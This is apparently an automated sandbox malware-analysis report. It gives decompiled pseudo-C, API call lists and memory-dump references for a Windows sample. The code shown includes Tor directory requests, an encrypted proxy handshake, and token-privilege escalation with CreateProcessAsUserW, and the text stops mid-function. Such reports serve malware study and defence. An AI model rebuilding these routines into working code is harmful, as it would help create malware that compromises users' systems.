      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4EA2
      • Part of subcall function 003A4DC1: sscanf.MSVCRT ref: 003A4ED4
      • Part of subcall function 003A4DC1: sprintf.MSVCRT ref: 003A4EFB
      • Part of subcall function 003A4DC1: sscanf.MSVCRT ref: 003A4F43
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4F88
      • Part of subcall function 003AFF10: closesocket.WS2_32(?), ref: 003AFF12
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F19
      • Part of subcall function 003A3EE9: htons.WS2_32(00000000), ref: 003A3F31
      • Part of subcall function 003A3EE9: memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3EE9: htons.WS2_32(?), ref: 003A3FB2
    Strings
    • GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0Host: %s, xrefs: 003A5067
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 16%
    			E003AEA68(char* _a4, intOrPtr* _a8, short* _a12) {
    				char _v8;
    				char _v24;
    				short _t11;
    
    				if(sscanf(_a4, "%15[^:]:%d",  &_v24,  &_v8) == 2) {
    					_t11 =  &_v24;
    					__imp__#11(_t11);
    					 *_a8 = _t11;
    					if(_t11 == 0xffffffff) {
    						goto L1;
    					} else {
    						__imp__#9(_v8);
    						 *_a12 = _t11;
    						return 1;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 30%
    			E003A3EE9(intOrPtr* __eax, void* __ecx, void* __eflags) {
    				void* _v8;
    				void* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				short _t38;
    				void* _t54;
    				void _t55;
    				intOrPtr* _t68;
    				void* _t70;
    				signed int _t71;
    				void* _t78;
    				void* _t86;
    
    				_t70 = __ecx;
    				_t68 = __eax;
    				_t78 =  *0x3b8538(0x200);
    				_v8 = _t78;
    				_v12 =  *0x3b8538(0x200);
    				memset(_t78, 0, 0x200);
    				 *_t78 = 0xd;
    				_t38 = E003AE937(_t70);
    				 *((short*)(_t68 + 0x138)) = _t38;
    				__imp__#9(_t38);
    				 *((short*)(_t78 + 3)) = _t38;
    				 *0x3b899c(_t68 + 8, _t78, 0x1fd);
    				_t71 = 0x1d;
    				memcpy( &_v148, _t68 + 8, _t71 << 2);
    				 *0x3b8ab0( &_v148,  &_v32);
    				_t86 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				memset(_t86, 0, 0x200);
    				if(E003A3BB7(_t68 + 0xf0, _v8, 0x1fd, _t86 + 3, _t68 + 0x110, _t68 + 0x120) == 0) {
    					L7:
    					 *0x3b8540(_v8);
    					 *0x3b8540(_t86);
    					_t54 = 0;
    				} else {
    					_t55 =  *(_t68 + 4) & 0x0000ffff;
    					__imp__#9(_t55);
    					 *_t86 = _t55;
    					 *((char*)(_t86 + 2)) = 3;
    					if(E003AFD0B( *_t68, _t86, 0x200) != 0x200) {
    						goto L7;
    					} else {
    						if(E003AFB73( *_t68, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t68 + 0x100, _v8 + 3, 0x1fd, _v12, _t68 + 0x124, _t68 + 0x134) == 0 ||  *_v12 != 4) {
    							_t86 = _v12;
    							goto L7;
    						} else {
    							 *0x3b8540(_v8);
    							 *0x3b8540(_v12);
    							_t54 = 1;
    						}
    					}
    				}
    				return _t54;
    			}

    APIs
    • memset.MSVCRT ref: 003A3F19
    • htons.WS2_32(00000000), ref: 003A3F31
    • memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A3FB2
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 69%
    			E003A0B00(void* __ecx, char __edx, void* __eflags, intOrPtr _a4) {
    				char _v8;
    				char _v16;
    				char _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t14;
    				void* _t16;
    				void* _t18;
    				void* _t21;
    				char _t34;
    				char* _t36;
    				void* _t37;
    				void* _t39;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t44;
    				void* _t48;
    
    				_t34 = __edx;
    				_t26 = _a4;
    				_t37 = __ecx;
    				_v20 = 0;
    				_v16 = 0;
    				_t14 = E0039C7B0(0, __eflags, _a4);
    				_a4 = _t14;
    				if(_t14 == 0) {
    					L10:
    					return 0;
    				}
    				_t16 = E0039ED90(_t14, 0, 0,  &_v20);
    				_t42 = _t41 + 0x10;
    				if(_t16 == 0) {
    					L9:
    					E0039BB40(_a4);
    					goto L10;
    				}
    				__imp___time64(0);
    				_t42 = _t42 + 4;
    				_t18 = _t16 - _v20;
    				_t48 = _t18;
    				asm("sbb edx, [ebp-0xc]");
    				_v8 = _t34;
    				if(_t48 < 0) {
    					goto L9;
    				}
    				if(_t48 > 0) {
    					L5:
    					_t39 = E00391BE0(_t37, _t49, _t26);
    					_t50 = _t39;
    					if(_t39 != 0) {
    						E00397A20(_t26, _t39, _t37);
    						_push(_t39);
    						L00391CB0();
    						_t44 = _t42 + 4;
    						_t36 =  &_v8;
    						_t21 = E0039EE40(_t37, _t36, _t50, _t26, _t36);
    						_t40 = _t21;
    						if(_t40 != 0) {
    							E00397A20(_t26, _t40, _t37);
    							_push(_t40);
    							L00391CB0();
    							_t42 = _t44 + 4;
    						} else {
    							__imp___time64(_t21);
    							_v20 = _t21 - 0x3ed78;
    							asm("sbb edx, esi");
    							_v16 = _t36;
    							E0039CAA0(_a4, _t40, _t40,  &_v20);
    							_t42 = _t44 + 0x14;
    						}
    					}
    					goto L9;
    				}
    				_t49 = _t18 - 0x3f480;
    				if(_t18 <= 0x3f480) {
    					goto L9;
    				}
    				goto L5;
    			}

    APIs
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
      • Part of subcall function 0039ED90: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
    • _time64.MSVCRT ref: 003A0B3F
      • Part of subcall function 00391BE0: ??2@YAPAXI@Z.MSVCRT ref: 00391C02
      • Part of subcall function 00391BE0: ??3@YAXPAX@Z.MSVCRT ref: 00391C4A
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003A0B72
      • Part of subcall function 0039EE40: ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
    • _time64.MSVCRT ref: 003A0B8D
    • ??3@YAXPAX@Z.MSVCRT ref: 003A0BBC
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B2614() {
    				intOrPtr _t10;
    				intOrPtr* _t11;
    				signed int _t12;
    				intOrPtr* _t15;
    				intOrPtr* _t16;
    				void* _t17;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				signed int _t25;
    				signed int _t26;
    				void* _t28;
    
    				_t28 =  *0x390000 - 0x5a4d; // 0x5a4d
    				if(_t28 == 0) {
    					_t10 =  *0x39003c; // 0x108
    					_t1 = _t10 + 0x390000; // 0x4550
    					_t11 = _t1;
    					__eflags =  *_t11 - 0x4550;
    					if( *_t11 != 0x4550) {
    						goto L1;
    					} else {
    						_t25 =  *(_t11 + 0x18) & 0x0000ffff;
    						__eflags = _t25 - 0x10b;
    						if(_t25 == 0x10b) {
    							__eflags =  *((intOrPtr*)(_t11 + 0x74)) - 0xe;
    							if( *((intOrPtr*)(_t11 + 0x74)) <= 0xe) {
    								goto L1;
    							} else {
    								_t26 = 0;
    								__eflags =  *(_t11 + 0xe8);
    								goto L9;
    							}
    						} else {
    							__eflags = _t25 - 0x20b;
    							if(_t25 != 0x20b) {
    								goto L1;
    							} else {
    								__eflags =  *((intOrPtr*)(_t11 + 0x84)) - 0xe;
    								if( *((intOrPtr*)(_t11 + 0x84)) <= 0xe) {
    									goto L1;
    								} else {
    									_t26 = 0;
    									__eflags =  *(_t11 + 0xf8);
    									L9:
    									_t8 = __eflags != 0;
    									__eflags = _t8;
    									_t12 = _t26 & 0xffffff00 | _t8;
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					_t12 = 0;
    				}
    				 *0x3b864c = _t12;
    				__set_app_type(E0039984A(2));
    				 *0x3b8c30 =  *0x3b8c30 | 0xffffffff;
    				 *0x3b8c34 =  *0x3b8c34 | 0xffffffff;
    				_t15 = __p__fmode();
    				_t22 =  *0x3b8988; // 0x0
    				 *_t15 = _t22;
    				_t16 = __p__commode();
    				_t23 =  *0x3b8984; // 0x0
    				 *_t16 = _t23;
    				_t17 = E00397D3B();
    				if( *0x3b8128 == 0) {
    					__setusermatherr(E00397D3B);
    				}
    				E00391421(_t17);
    				return 0;
    			}

    APIs
      • Part of subcall function 0039984A: GetModuleHandleA.KERNEL32(00000000), ref: 00399851
    • __set_app_type.MSVCRT ref: 003B2680
    • __p__fmode.MSVCRT ref: 003B2696
    • __p__commode.MSVCRT ref: 003B26A4
    • __setusermatherr.MSVCRT ref: 003B26C5
      • Part of subcall function 00391421: _controlfp.MSVCRT ref: 0039142B
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
    • socket.WS2_32(00000002,00000001,00000000), ref: 003AEB2B
    • connect.WS2_32(00000000,?,00000010), ref: 003AEB4F
    • closesocket.WS2_32(00000000), ref: 003AEB5A
    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 003AEB7C
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 54%
    			E00397CF0(intOrPtr* __ecx) {
    				void* _t3;
    				long _t5;
    				intOrPtr _t6;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				void* _t10;
    
    				_t8 = __ecx;
    				_t9 =  *__ecx;
    				if(_t9 != 0) {
    					_t5 = InterlockedDecrement(_t9 + 8);
    					if(_t5 == 0 && _t9 != 0) {
    						_t6 =  *_t9;
    						if(_t6 != 0) {
    							__imp__#6(_t6);
    						}
    						_t5 =  *(_t9 + 4);
    						if(_t5 != 0) {
    							_push(_t5);
    							L0039CB64();
    							_t10 = _t10 + 4;
    						}
    						_push(_t9);
    						L00391CB0();
    					}
    					 *_t8 = 0;
    					return _t5;
    				}
    				return _t3;
    			}

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 00397CFE
    • SysFreeString.OLEAUT32(00000000), ref: 00397D13
    • ??_V@YAXPAX@Z.MSVCRT ref: 00397D21
    • ??3@YAXPAX@Z.MSVCRT ref: 00397D2A
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 72%
    			E00392220(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
    				void* _v8;
    				signed int _v12;
    				char _v16;
    				void* _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v36;
    				short _v40;
    				intOrPtr _v44;
    				char _v244;
    				void* __ebx;
    				intOrPtr _t66;
    				intOrPtr* _t67;
    				intOrPtr* _t68;
    				intOrPtr* _t77;
    				intOrPtr _t80;
    				char _t81;
    				intOrPtr* _t82;
    				intOrPtr* _t85;
    				void* _t87;
    				intOrPtr* _t91;
    				void* _t95;
    				void* _t97;
    				void* _t103;
    				intOrPtr _t117;
    				intOrPtr _t139;
    				intOrPtr _t141;
    				intOrPtr* _t143;
    				void* _t145;
    				void* _t146;
    				void* _t147;
    				void* _t148;
    
    				_t139 = __ecx;
    				_v44 = __ecx;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v40 = 0;
    				E0039BB30( &_v36);
    				E0039A540(0, __ecx);
    				_t143 = _a4;
    				_push( &_v40);
    				_push(_t143);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x58))))() >= 0) {
    					if(_v40 != 0xffff) {
    						L17:
    						_v24 = 1;
    						 *((intOrPtr*)(_t139 + 0x1c)) = _v12;
    						 *((intOrPtr*)(_t139 + 0x24)) = _v28;
    					} else {
    						_push( &_v20);
    						_push(_t143);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x30))))() >= 0) {
    							_t77 = _v20;
    							_push( &_v12);
    							_push(_t77);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x20))))() >= 0) {
    								_t80 = E003A1D90(_v12 * 8, 0);
    								_t147 = _t146 + 8;
    								_v28 = _t80;
    								if(_t80 != 0) {
    									_t145 = 0;
    									if(_v12 <= 0) {
    										goto L17;
    									} else {
    										_t141 = _t80;
    										while(1) {
    											_t81 = _v16;
    											if(_t81 != 0) {
    												__imp__#6(_t81);
    											}
    											_t82 = _v20;
    											_push( &_v8);
    											_v16 = 0;
    											_push(_t145);
    											_push(_t82);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
    												goto L18;
    											}
    											_t85 = _v8;
    											_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0xa4))))(_t85,  &_v16);
    											_t157 = _t87;
    											if(_t87 >= 0) {
    												E00399090(_t157,  &_v244, 0x7c);
    												_t117 =  *0x3b8628; // 0x593938
    												_t147 = _t147 + 8;
    												_push( &_v244);
    												_push(_v16);
    												if( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0xe0))))() != 0) {
    													L15:
    													_t91 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 8))))(_t91);
    													_t145 = _t145 + 1;
    													_t141 = _t141 + 8;
    													_v8 = 0;
    													if(_t145 < _v12) {
    														continue;
    													} else {
    														_t139 = _v44;
    														goto L17;
    													}
    												} else {
    													E0039B1E0(0,  &_v36);
    													_t95 = E0039A140( &_v36, _v8);
    													_t159 = _t95;
    													if(_t95 != 0) {
    														E00399090(_t159,  &_v244, 0x27);
    														_t148 = _t147 + 8;
    														_t97 = E00391A10( &_v36,  &_v244, _t141);
    														_t160 = _t97;
    														if(_t97 != 0) {
    															E00399090(_t160,  &_v244, 0x7d);
    															_t147 = _t148 + 8;
    															_t42 = _t141 + 4; // 0x4
    															E00391A10( &_v36,  &_v244, _t42);
    															goto L15;
    														}
    													}
    												}
    											}
    											goto L18;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				L18:
    				_t66 = _v16;
    				if(_t66 != 0) {
    					__imp__#6(_t66);
    				}
    				_t67 = _v8;
    				if(_t67 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
    				}
    				_t68 = _v20;
    				_pop(_t103);
    				if(_t68 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t68 + 8))))(_t68);
    				}
    				L003926B0(_t103,  &_v36);
    				return _v24;
    			}

    APIs
      • Part of subcall function 0039A540: SysFreeString.OLEAUT32(00000000), ref: 0039A559
      • Part of subcall function 0039A540: SysFreeString.OLEAUT32(00000001), ref: 0039A563
    • SysFreeString.OLEAUT32(?), ref: 003923DB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • SysFreeString.OLEAUT32(?), ref: 003922D8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 91%
    			E00394310(void* __ecx) {
    				short _v8;
    				short _v12;
    				short _v16;
    				void* _v20;
    				void* _v24;
    				void* _v28;
    				void* _v32;
    				char _v100;
    				char _v300;
    				char _v824;
    				WCHAR* _t44;
    				WCHAR* _t49;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t58;
    				intOrPtr _t62;
    				WCHAR* _t63;
    				void* _t69;
    				intOrPtr _t76;
    				char* _t84;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				intOrPtr _t91;
    				void* _t93;
    				WCHAR* _t95;
    				void* _t97;
    				void* _t98;
    
    				_t69 = __ecx;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v28 = 0;
    				_v32 = 0;
    				if(E00396D30() != 0) {
    					E0039F990( &_v32);
    					_t44 = _v32;
    					_t98 = _t97 + 4;
    					_t94 =  &_v824;
    					_v824 = 0;
    					__imp__SHGetFolderPathW(0, 0x1c, _t44, 0,  &_v824, _t93);
    					__eflags = _t44;
    					if(__eflags >= 0) {
    						E00399090(__eflags,  &_v300, 0xe);
    						_t98 = _t98 + 8;
    						_t84 =  &_v824;
    						_t85 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t85 + 0xdc))))(_t84,  &_v300, 0, _t84);
    					} else {
    						_t94 = 0;
    					}
    					_t49 = E0039CF50(_t69, _t94,  &_v28);
    					_t95 = _v28;
    					__eflags = _t49;
    					if(_t49 != 0) {
    						__eflags = _t95;
    						if(_t95 != 0) {
    							_t58 = E0039C320( &_v24,  &_v20, _t95, 0x420);
    							_t89 =  *0x3b8628; // 0x593938
    							_t98 = _t98 + 0x10;
    							__eflags = _t58;
    							if(_t58 == 0) {
    								_v100 = 0x44;
    								 *((intOrPtr*)( *((intOrPtr*)(_t89 + 0xb8))))( &_v100);
    								_v24 = 0;
    								_v20 = 0;
    								_v16 = 0;
    								_v12 = 0;
    								_t62 =  *0x3b8628; // 0x593938
    								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xd8))))(_t95, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
    								__eflags = _t63;
    								if(_t63 != 0) {
    									goto L9;
    								} else {
    									 *((intOrPtr*)(_t69 + 0x38)) = 6;
    								}
    							} else {
    								 *((intOrPtr*)( *((intOrPtr*)(_t89 + 0xf8))))(_v24);
    								_t91 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t91 + 0xf8))))(_v20);
    								L9:
    								_v8 = 1;
    							}
    						}
    					}
    					_t50 = _v24;
    					__eflags = _t50;
    					if(_t50 != 0) {
    						_t87 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xf8))))(_t50);
    					}
    					_t51 = _v20;
    					__eflags = _t51;
    					if(_t51 != 0) {
    						_t76 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t76 + 0xf8))))(_t51);
    					}
    					__eflags = _t95;
    					if(_t95 != 0) {
    						E0039BB40(_t95);
    					}
    					return _v8;
    				} else {
    					return E00397D40(_t69);
    				}
    			}

    APIs
      • Part of subcall function 00396D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA0F
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA32
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA55
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA78
    • SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00394371
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C3D2
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C3F5
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C418
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C43B
      • Part of subcall function 0039C320: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 0039C48A
      • Part of subcall function 0039C320: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0039C4BD
      • Part of subcall function 0039C320: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0039C5A5
      • Part of subcall function 0039C320: GetLastError.KERNEL32 ref: 0039C5AB
      • Part of subcall function 0039C320: GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0039C5EC
      • Part of subcall function 0039C320: CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0039C6F2
      • Part of subcall function 0039C320: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0039C783
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 95%
    			E003B0BB0(void* __ebx, void* __eflags) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v216;
    				char _v416;
    				void* _t29;
    				intOrPtr _t34;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				void* _t42;
    				intOrPtr _t54;
    				intOrPtr _t55;
    				intOrPtr _t64;
    				void* _t66;
    				void* _t67;
    				void* _t68;
    				void* _t69;
    
    				_t42 = __ebx;
    				_v8 = 0;
    				_v12 = 0;
    				E00399090(__eflags,  &_v216, 0xcf);
    				_t54 =  *0x3b8628; // 0x593938
    				_t67 = _t66 + 8;
    				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0xe4))))( &_v216, 0x80000000, 1, 0, 3, 0x80, 0);
    				_t72 = _t29 - 0xffffffff;
    				if(_t29 != 0xffffffff) {
    					L2:
    					_t55 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xf8))))(_t29);
    					E00399090(_t73,  &_v416, 3);
    					_t34 = E0039F550( &_v416, 0,  &_v416, 0xa,  &_v8,  &_v12);
    					_t68 = _t67 + 0x1c;
    					if(_t34 == 0) {
    						L13:
    						return _t34;
    					}
    					_push(8);
    					L0039A47E();
    					_t69 = _t68 + 4;
    					if(_t34 == 0) {
    						_t64 = 0;
    						L6:
    						_t35 = E003969F0(_t34, _t64,  &_v16);
    						_t69 = _t69 + 8;
    						_t78 = _t35 - 1;
    						if(_t35 == 1) {
    							_v8 = 0;
    							_v12 = 0;
    							E00399090(_t78,  &_v416, 0x12);
    							_t35 = E0039F550( &_v8, 0,  &_v416, 0xa,  &_v8,  &_v12);
    							_t69 = _t69 + 0x1c;
    							if(_t35 != 0) {
    								_t35 = _v8;
    								if(_t35 != 0) {
    									E003B0900(_t42, _t35, _v12);
    									_t35 = E0039BB40(_v8);
    									_t69 = _t69 + 0xc;
    								}
    							}
    						}
    						L10:
    						if(_t64 != 0) {
    							_t35 = E00391700(_t64);
    							_push(_t64);
    							L00391CB0();
    						}
    						return _t35;
    					}
    					_t64 = _t34;
